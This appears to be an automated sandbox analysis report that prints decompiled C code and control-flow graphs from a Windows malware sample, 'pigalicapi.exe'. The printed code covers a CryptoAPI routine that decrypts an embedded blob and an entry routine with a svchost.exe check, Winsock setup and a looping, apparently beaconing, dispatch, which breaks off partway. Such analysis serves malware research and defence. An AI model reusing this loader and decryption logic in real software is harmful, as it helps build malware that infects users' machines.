                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 698 40047f0-4004801 699 4004807-400480e 698->699 700 4004aab-4004ab1 698->700 699->700 701 4004814-4004832 CryptAcquireContextA 699->701 702 4004834-400483f GetLastError 701->702 703 4004856-400485a 701->703 702->703 704 4004841-4004850 CryptAcquireContextA 702->704 703->700 705 4004860-400489d 703->705 704->703 707 40048a3-40048f3 call 4007b70 CryptCreateHash 705->707 708 4004a9f-4004aa5 CryptReleaseContext 705->708 711 4004a90-4004a96 707->711 712 40048f9-4004913 CryptHashData 707->712 708->700 713 4004a98 711->713 714 4004a9a 711->714 715 4004a83-4004a8a CryptDestroyHash 712->715 716 4004919-4004944 CryptDeriveKey 712->716 713->708 714->708 715->711 716->715 717 400494a-400498f CryptDecrypt CryptDestroyKey 716->717 717->715 718 4004995-40049b1 CryptCreateHash 717->718 718->715 719 40049b7-40049d4 CryptHashData 718->719 720 4004a76-4004a7d CryptDestroyHash 719->720 721 40049da-4004a0f CryptGetHashParam 719->721 720->715 721->720 722 4004a11-4004a3c CryptGetHashParam 721->722 722->720 723 4004a3e-4004a58 call 4007c70 722->723 723->720 726 4004a5a-4004a72 call 4007b70 723->726 726->720
                                                                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                                                                          			E040047F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				signed int _v5;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				char _v764;
                                                                                                                                                                                                                                                                          				char _v780;
                                                                                                                                                                                                                                                                          				intOrPtr _v784;
                                                                                                                                                                                                                                                                          				char _v788;
                                                                                                                                                                                                                                                                          				int _v792;
                                                                                                                                                                                                                                                                          				int _v796;
                                                                                                                                                                                                                                                                          				intOrPtr _v800;
                                                                                                                                                                                                                                                                          				long* _v804;
                                                                                                                                                                                                                                                                          				int _v808;
                                                                                                                                                                                                                                                                          				int _v812;
                                                                                                                                                                                                                                                                          				char _v816;
                                                                                                                                                                                                                                                                          				int _v820;
                                                                                                                                                                                                                                                                          				char _v824;
                                                                                                                                                                                                                                                                          				char _v828;
                                                                                                                                                                                                                                                                          				char _v844;
                                                                                                                                                                                                                                                                          				int _t61;
                                                                                                                                                                                                                                                                          				char* _t67;
                                                                                                                                                                                                                                                                          				intOrPtr _t68;
                                                                                                                                                                                                                                                                          				int _t69;
                                                                                                                                                                                                                                                                          				char* _t73;
                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                          				intOrPtr _t76;
                                                                                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                                                                                          				signed char _t78;
                                                                                                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 <= 0x300) {
                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t61 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                                                                                                                                          						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v788 = 0x10;
                                                                                                                                                                                                                                                                          						_v784 = 0x10;
                                                                                                                                                                                                                                                                          						_v792 = 0;
                                                                                                                                                                                                                                                                          						while(_v792 < _a8 - 0x2ff) {
                                                                                                                                                                                                                                                                          							E04007B70( &_v780, _a4 + _v792, 0x300);
                                                                                                                                                                                                                                                                          							_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                          							_t67 =  &_v780;
                                                                                                                                                                                                                                                                          							_v800 = _t67;
                                                                                                                                                                                                                                                                          							_v796 = 0;
                                                                                                                                                                                                                                                                          							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796); // executed
                                                                                                                                                                                                                                                                          							if(_t67 == 0) {
                                                                                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                                                                                          								if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          									_v792 = _v792 + 1;
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t68 = _v800;
                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v796, _t68, 0x10, 0);
                                                                                                                                                                                                                                                                          							if(_t68 != 0) {
                                                                                                                                                                                                                                                                          								_v804 = 0;
                                                                                                                                                                                                                                                                          								_t69 = _v796;
                                                                                                                                                                                                                                                                          								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
                                                                                                                                                                                                                                                                          								if(_t69 != 0) {
                                                                                                                                                                                                                                                                          									_v812 = 0x2f0;
                                                                                                                                                                                                                                                                          									_v808 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812);
                                                                                                                                                                                                                                                                          									CryptDestroyKey(_v804);
                                                                                                                                                                                                                                                                          									if(_v808 != 0) {
                                                                                                                                                                                                                                                                          										_t73 =  &_v816;
                                                                                                                                                                                                                                                                          										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73);
                                                                                                                                                                                                                                                                          										if(_t73 != 0) {
                                                                                                                                                                                                                                                                          											_t74 = _v816;
                                                                                                                                                                                                                                                                          											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
                                                                                                                                                                                                                                                                          											if(_t74 != 0) {
                                                                                                                                                                                                                                                                          												_v820 = 0;
                                                                                                                                                                                                                                                                          												_v824 = 4;
                                                                                                                                                                                                                                                                          												_t76 = _v816;
                                                                                                                                                                                                                                                                          												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
                                                                                                                                                                                                                                                                          												if(_t76 != 0) {
                                                                                                                                                                                                                                                                          													_v828 = 0x10;
                                                                                                                                                                                                                                                                          													_t77 = _v816;
                                                                                                                                                                                                                                                                          													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
                                                                                                                                                                                                                                                                          													if(_t77 != 0) {
                                                                                                                                                                                                                                                                          														_t78 = E04007C70( &_v28,  &_v844,  &_v28, 0x10);
                                                                                                                                                                                                                                                                          														_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                          														if((_t78 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          															E04007B70(_a12,  &_v780, 0x300);
                                                                                                                                                                                                                                                                          															_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                          															_v5 = 1;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											__imp__CryptDestroyHash(_v816);
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v796);
                                                                                                                                                                                                                                                                          							goto L21;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L25;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}































                                                                                                                                                                                                                                                                          0x040047f9
                                                                                                                                                                                                                                                                          0x04004801
                                                                                                                                                                                                                                                                          0x04004aab
                                                                                                                                                                                                                                                                          0x04004ab1
                                                                                                                                                                                                                                                                          0x04004814
                                                                                                                                                                                                                                                                          0x04004814
                                                                                                                                                                                                                                                                          0x0400482a
                                                                                                                                                                                                                                                                          0x04004832
                                                                                                                                                                                                                                                                          0x04004850
                                                                                                                                                                                                                                                                          0x04004850
                                                                                                                                                                                                                                                                          0x0400485a
                                                                                                                                                                                                                                                                          0x04004860
                                                                                                                                                                                                                                                                          0x0400486a
                                                                                                                                                                                                                                                                          0x04004874
                                                                                                                                                                                                                                                                          0x0400488f
                                                                                                                                                                                                                                                                          0x040048b9
                                                                                                                                                                                                                                                                          0x040048be
                                                                                                                                                                                                                                                                          0x040048c1
                                                                                                                                                                                                                                                                          0x040048c7
                                                                                                                                                                                                                                                                          0x040048cd
                                                                                                                                                                                                                                                                          0x040048eb
                                                                                                                                                                                                                                                                          0x040048f3
                                                                                                                                                                                                                                                                          0x04004a90
                                                                                                                                                                                                                                                                          0x04004a96
                                                                                                                                                                                                                                                                          0x04004889
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004889
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004a98
                                                                                                                                                                                                                                                                          0x040048fd
                                                                                                                                                                                                                                                                          0x0400490b
                                                                                                                                                                                                                                                                          0x04004913
                                                                                                                                                                                                                                                                          0x04004919
                                                                                                                                                                                                                                                                          0x0400492c
                                                                                                                                                                                                                                                                          0x0400493c
                                                                                                                                                                                                                                                                          0x04004944
                                                                                                                                                                                                                                                                          0x0400494a
                                                                                                                                                                                                                                                                          0x04004975
                                                                                                                                                                                                                                                                          0x04004982
                                                                                                                                                                                                                                                                          0x0400498f
                                                                                                                                                                                                                                                                          0x04004995
                                                                                                                                                                                                                                                                          0x040049a9
                                                                                                                                                                                                                                                                          0x040049b1
                                                                                                                                                                                                                                                                          0x040049c5
                                                                                                                                                                                                                                                                          0x040049cc
                                                                                                                                                                                                                                                                          0x040049d4
                                                                                                                                                                                                                                                                          0x040049da
                                                                                                                                                                                                                                                                          0x040049e4
                                                                                                                                                                                                                                                                          0x04004a00
                                                                                                                                                                                                                                                                          0x04004a07
                                                                                                                                                                                                                                                                          0x04004a0f
                                                                                                                                                                                                                                                                          0x04004a11
                                                                                                                                                                                                                                                                          0x04004a2d
                                                                                                                                                                                                                                                                          0x04004a34
                                                                                                                                                                                                                                                                          0x04004a3c
                                                                                                                                                                                                                                                                          0x04004a4b
                                                                                                                                                                                                                                                                          0x04004a50
                                                                                                                                                                                                                                                                          0x04004a58
                                                                                                                                                                                                                                                                          0x04004a6a
                                                                                                                                                                                                                                                                          0x04004a6f
                                                                                                                                                                                                                                                                          0x04004a72
                                                                                                                                                                                                                                                                          0x04004a72
                                                                                                                                                                                                                                                                          0x04004a58
                                                                                                                                                                                                                                                                          0x04004a3c
                                                                                                                                                                                                                                                                          0x04004a0f
                                                                                                                                                                                                                                                                          0x04004a7d
                                                                                                                                                                                                                                                                          0x04004a7d
                                                                                                                                                                                                                                                                          0x040049b1
                                                                                                                                                                                                                                                                          0x0400498f
                                                                                                                                                                                                                                                                          0x04004944
                                                                                                                                                                                                                                                                          0x04004a8a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004a8a
                                                                                                                                                                                                                                                                          0x04004aa5
                                                                                                                                                                                                                                                                          0x04004aa5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400485a

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04004845
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400481F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 2739279601-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                          • Instruction ID: 68028e15a08110d1318f396c41aabee13b9dff780772823a15a50aa733777c46
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E71DF71A54318ABFB65CF50CC45BED77BCAB48B04F408598A605BA1C0DBB9ABC4CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 788 4003b00-4003b5c call 4001000 call 4003130 call 4002ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call 4004510 797 4003b62-4003c8c call 4007d20 call 4005700 call 4005a00 call 4007d20 call 4009400 call 40099f0 call 4006060 call 4005e00 StrStrIA call 4001120 call 4005e30 call 4006cf0 call 4005f30 call 4009b90 WSAStartup 788->797 798 400400a-400400c ExitProcess 788->798 797->798 825 4003c92-4003cb1 797->825 826 4003cc0-4003cc9 825->826 827 4003cb3-4003cbb 825->827 828 4003cda-4003ce3 826->828 829 4003ccb-4003cd4 826->829 827->826 830 4003cf4-4003cfd 828->830 831 4003ce5-4003cee 828->831 829->828 832 4003d0c-4003d15 830->832 833 4003cff-4003d07 830->833 831->830 834 4003d26-4003d2f 832->834 835 4003d17-4003d20 832->835 833->832 836 4003d40-4003dfd call 4007d20 call 400a700 call 400a4b0 call 4005b50 call 4008a70 834->836 837 4003d31-4003d3a 834->837 835->834 848 4003e49 836->848 849 4003dff-4003e3f call 4007d20 call 40078d0 836->849 837->836 851 4003e53-4003eab call 4007970 call 4004020 848->851 849->848 859 4003eb1-4003ed9 call 4004020 851->859 860 4003f8a 851->860 866 4003f81 859->866 867 4003edf-4003efa call 4004020 859->867 862 4003f91-4003f9a 860->862 864 4003f9c-4003fa3 862->864 865 4003fed-4003ffa Sleep 862->865 868 4003fd0-4003fd7 864->868 869 4003fa5-4003fac 864->869 865->851 870 4003f88 866->870 875 4003eff-4003f07 867->875 868->865 874 4003fd9-4003fe3 868->874 872 4003fc4 869->872 873 4003fae-4003fc2 869->873 870->862 876 4003fce 872->876 873->876 874->865 877 4003f78 875->877 878 4003f09-4003f50 call 40042e0 call 4004020 875->878 876->865 879 4003f7f 877->879 884 4003f52 878->884 885 4003f59-4003f60 878->885 879->870 884->885 886 4003f62-4003f70 VirtualFree 885->886 887 4003f76 885->887 886->887 887->879
                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                          			_entry_() {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				char _v1148;
                                                                                                                                                                                                                                                                          				signed char _v1149;
                                                                                                                                                                                                                                                                          				intOrPtr _v1156;
                                                                                                                                                                                                                                                                          				char _v1556;
                                                                                                                                                                                                                                                                          				char _v9556;
                                                                                                                                                                                                                                                                          				long _v9560;
                                                                                                                                                                                                                                                                          				char _v9564;
                                                                                                                                                                                                                                                                          				char _v12068;
                                                                                                                                                                                                                                                                          				signed int _v12072;
                                                                                                                                                                                                                                                                          				char _v12076;
                                                                                                                                                                                                                                                                          				long _v12080;
                                                                                                                                                                                                                                                                          				char _v12081;
                                                                                                                                                                                                                                                                          				long _v12088;
                                                                                                                                                                                                                                                                          				long _v12092;
                                                                                                                                                                                                                                                                          				long _v12096;
                                                                                                                                                                                                                                                                          				signed int _v12100;
                                                                                                                                                                                                                                                                          				signed char _v12101;
                                                                                                                                                                                                                                                                          				long _v12108;
                                                                                                                                                                                                                                                                          				signed int _v12112;
                                                                                                                                                                                                                                                                          				void* _v12116;
                                                                                                                                                                                                                                                                          				signed char _t69;
                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                          				signed char _t77;
                                                                                                                                                                                                                                                                          				signed char _t79;
                                                                                                                                                                                                                                                                          				signed int _t80;
                                                                                                                                                                                                                                                                          				signed char _t85;
                                                                                                                                                                                                                                                                          				signed char _t86;
                                                                                                                                                                                                                                                                          				signed char _t87;
                                                                                                                                                                                                                                                                          				intOrPtr _t88;
                                                                                                                                                                                                                                                                          				char* _t89;
                                                                                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                                                                                          				signed char _t102;
                                                                                                                                                                                                                                                                          				signed char _t104;
                                                                                                                                                                                                                                                                          				signed char _t106;
                                                                                                                                                                                                                                                                          				signed char _t110;
                                                                                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                                                                                          				char _t125;
                                                                                                                                                                                                                                                                          				signed int _t138;
                                                                                                                                                                                                                                                                          				signed int _t140;
                                                                                                                                                                                                                                                                          				intOrPtr _t143;
                                                                                                                                                                                                                                                                          				signed int _t159;
                                                                                                                                                                                                                                                                          				signed int _t161;
                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                                                                                                          				void* _t173;
                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				E04001000(0x2f50);
                                                                                                                                                                                                                                                                          				_v8 = E04003130();
                                                                                                                                                                                                                                                                          				E04002ED0(_v8);
                                                                                                                                                                                                                                                                          				GetModuleFileNameA(0, "C:\Users\engineer\pigalicapi.exe", 0x208);
                                                                                                                                                                                                                                                                          				SetUnhandledExceptionFilter(E04005DB0); // executed
                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0); // executed
                                                                                                                                                                                                                                                                          				_t69 = E04004510(_v8, 0x4013c88); // executed
                                                                                                                                                                                                                                                                          				_t165 = _t163 + 0xc;
                                                                                                                                                                                                                                                                          				if((_t69 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                                                                                          					ExitProcess(0);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				E04007D20( &_v1148,  &_v1148, 0, 0x46b);
                                                                                                                                                                                                                                                                          				E04005700( &_v1148); // executed
                                                                                                                                                                                                                                                                          				_t143 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_t74 = E04005A00( &_v1148, _t143, 0xff); // executed
                                                                                                                                                                                                                                                                          				_v1156 = _t74;
                                                                                                                                                                                                                                                                          				E04007D20(_t74, "Kobucgekyxca", 0, 0x12c);
                                                                                                                                                                                                                                                                          				E04009400( &_v1148, "Kobucgekyxca", 0xa); // executed
                                                                                                                                                                                                                                                                          				_t77 = E040099F0(); // executed
                                                                                                                                                                                                                                                                          				 *0x401435a = _t77;
                                                                                                                                                                                                                                                                          				 *0x401435d = E04006060(); // executed
                                                                                                                                                                                                                                                                          				_t79 = E04005E00(); // executed
                                                                                                                                                                                                                                                                          				 *0x401435e = _t79;
                                                                                                                                                                                                                                                                          				_t80 = StrStrIA("C:\Users\engineer\pigalicapi.exe", "svchost.exe"); // executed
                                                                                                                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                          				 *0x4014362 =  ~( ~_t80);
                                                                                                                                                                                                                                                                          				E04001120("C:\Users\engineer\pigalicapi.exe", "pigalicapi",  *0x401435a & 0x000000ff,  *0x4014362 & 0x000000ff, 0x401436c); // executed
                                                                                                                                                                                                                                                                          				_t85 = E04005E30(0); // executed
                                                                                                                                                                                                                                                                          				 *0x401435b = _t85;
                                                                                                                                                                                                                                                                          				 *0x401435f = 1; // executed
                                                                                                                                                                                                                                                                          				_t86 = E04006CF0(); // executed
                                                                                                                                                                                                                                                                          				_v1149 = _t86;
                                                                                                                                                                                                                                                                          				_t87 = E04005F30(); // executed
                                                                                                                                                                                                                                                                          				 *0x401435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
                                                                                                                                                                                                                                                                          				_t88 = E04009B90(0xffffffff);
                                                                                                                                                                                                                                                                          				_t173 = _t165 + 0x50;
                                                                                                                                                                                                                                                                          				 *0x4014364 = _t88;
                                                                                                                                                                                                                                                                          				_t89 =  &_v1556;
                                                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                                                          				_push(0x202); // executed
                                                                                                                                                                                                                                                                          				L0400B1E6(); // executed
                                                                                                                                                                                                                                                                          				if(_t89 != 0) {
                                                                                                                                                                                                                                                                          					goto L39;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_t125 =  *0x40119a8; // 0x1d
                                                                                                                                                                                                                                                                          					_v12081 = _t125;
                                                                                                                                                                                                                                                                          					 *0x4014378 = 0x10;
                                                                                                                                                                                                                                                                          					if(( *0x401435f & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t118 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t118 | 0x00000008;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x401435c & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t161 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t161 | 0x00000001;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t140 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t140 | 0x00000004;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x401435e & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t116 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t116 | 0x00000002;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x4014360 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t159 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t159 | 0x00000020;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t91 =  *0x4014361 & 0x000000ff;
                                                                                                                                                                                                                                                                          					if(( *0x4014361 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t138 =  *0x4014378; // 0x1c
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t138 | 0x00000040;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v9564 = 0x9c3;
                                                                                                                                                                                                                                                                          					E04007D20(_t91,  &_v12068, 0, 0x9c4);
                                                                                                                                                                                                                                                                          					E0400A700();
                                                                                                                                                                                                                                                                          					E0400A4B0( &_v12068,  &_v9564, 0x4013cb6,  *0x4013cb4 & 0x0000ffff);
                                                                                                                                                                                                                                                                          					_v9560 = 0;
                                                                                                                                                                                                                                                                          					_t97 = E04005B50( &_v12068, ";",  &_v9560, 0); // executed
                                                                                                                                                                                                                                                                          					_v12072 = _t97;
                                                                                                                                                                                                                                                                          					_v12092 = 0;
                                                                                                                                                                                                                                                                          					_v12080 = 0;
                                                                                                                                                                                                                                                                          					_v12076 = 0x4b0;
                                                                                                                                                                                                                                                                          					_t98 = E04008A70(0x4012c34,  &_v12076, 0x4012ba8, 0x8c, 0x400e008, 0x254); // executed
                                                                                                                                                                                                                                                                          					_t177 = _t173 + 0x44;
                                                                                                                                                                                                                                                                          					if(_t98 != 0) {
                                                                                                                                                                                                                                                                          						E04007D20( &_v9556,  &_v9556, 0, 0x1f40);
                                                                                                                                                                                                                                                                          						E040078D0(0x4012c34, 0xc8,  &_v9556, 0xc8);
                                                                                                                                                                                                                                                                          						_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                          						_v12092 =  &_v9556;
                                                                                                                                                                                                                                                                          						_v12080 = 0xc8;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v12088 = 0;
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					_v12101 = 0;
                                                                                                                                                                                                                                                                          					_v12108 = 0x1d4c0;
                                                                                                                                                                                                                                                                          					_v12096 = 0;
                                                                                                                                                                                                                                                                          					_t100 = E04007970( &_v12096); // executed
                                                                                                                                                                                                                                                                          					_v12100 = _t100;
                                                                                                                                                                                                                                                                          					_t102 = E04004020(_v12096, _v12100,  &_v1148, 1, 2, 0);
                                                                                                                                                                                                                                                                          					_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                          					if((_t102 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v12101 = 1;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t104 = E04004020(_v12092, _v12080,  &_v1148, 1, 5, 0);
                                                                                                                                                                                                                                                                          						_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                          						if((_t104 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							_v12101 = 1;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_t106 = E04004020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
                                                                                                                                                                                                                                                                          							_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                          							if((_t106 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          								_v12101 = 1;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v12116 = 0;
                                                                                                                                                                                                                                                                          								_v12112 = E040042E0( &_v12116);
                                                                                                                                                                                                                                                                          								_t110 = E04004020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
                                                                                                                                                                                                                                                                          								_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                          								if((_t110 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          									_v12101 = 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v12116 != 0) {
                                                                                                                                                                                                                                                                          									VirtualFree(_v12116, 0, 0x8000);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if((_v12101 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						if( *0x40118a4 != 1) {
                                                                                                                                                                                                                                                                          							if( *0x40118a4 == 2) {
                                                                                                                                                                                                                                                                          								 *0x40118a4 = 1;
                                                                                                                                                                                                                                                                          								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							if( *0x40130e4 != 2) {
                                                                                                                                                                                                                                                                          								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v12108 = 0x3e8;
                                                                                                                                                                                                                                                                          								 *0x40118a4 = 2;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
